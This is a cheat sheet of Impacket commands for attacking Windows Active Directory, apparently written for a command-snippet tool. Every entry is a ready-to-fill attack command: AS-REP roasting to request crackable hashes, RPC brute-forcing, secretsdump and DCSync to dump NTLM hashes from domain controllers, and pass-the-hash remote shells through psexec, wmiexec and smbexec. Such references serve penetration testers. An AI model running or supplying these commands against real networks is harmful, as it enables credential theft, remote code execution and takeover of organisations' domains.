impacket.cheat
% roasting, active-directory
# Get all hashes of the domain (no preauth roasting)
GetNPUsers.py <domain>/<user> -request -no-pass -dc-ip <ip> -format <hashcat_john>
# Get user hashes from a users file (no preauth roasting)
GetNPUsers.py -no-pass -dc-ip <ip> -usersfile <usersfile> <domain>/ -request -format <hashcat_john>
# Get the hash for a single user (no preauth roasting)
GetNPUsers.py -no-pass -dc-ip <ip> <domain>/<user> -request -format <hashcat_john>
% rpc
# RPC info
rpcmap.py 'ncacn_ip_tcp:<ip>'
# RPC brute-force
rpcmap.py 'ncacn_ip_tcp:<ip>' -brute-uuids -brute-opnums -auth-level 1 -opnum-max 5
% hash, ntds, active-directory
# Show info from a local ntds.dit file
secretsdump.py -pwd-last-set -user-status -history -ntds <ntds.dit> -security SECURITY -system SYSTEM local
# Get ntds.dit secrets
secretsdump.py -hashes <ntlmhash>:<ntlmhash> '<user>'@<target>
# Get all secrets a user has access to from a DC
secretsdump.py -just-dc <user>
# Requires GetChangesAll permission: DCSync to dump all NTLM hashes
secretsdump.py -dc-ip <dc> <domain>/<user>:<password>@<dc>
% registry
# Query the Windows registry from Linux
reg.py -hashes <hash> <domain>/<user> query -keyName HKU\\
% connection, cmd
# psexec cmd console remote connection
psexec.py -hashes <ntlmhash>:<ntlmhash> <user>@<target> cmd
# wmi cmd console remote connection
wmiexec.py -hashes <ntlmhash>:<ntlmhash> <user>@<target> cmd
% rdp
# RDP credential check
rdp_check.py <domain>/<name>:<password>@<IP>
% mssql
# Get an MSSQL shell
mssqlclient.py <user>@<target>
% smb
# Enumerate users via SMB as guest
lookupsid.py guest@<target>
# Connect to the target's SMB shares
smbclient.py <user>:<pass>@<target>
# Get a semi-interactive shell to execute commands
smbexec.py -hashes :<hash> <user>@<target>
% delegation
# Check for constrained/unconstrained delegation
findDelegation.py <user>:<pass> -dc-ip <dcip>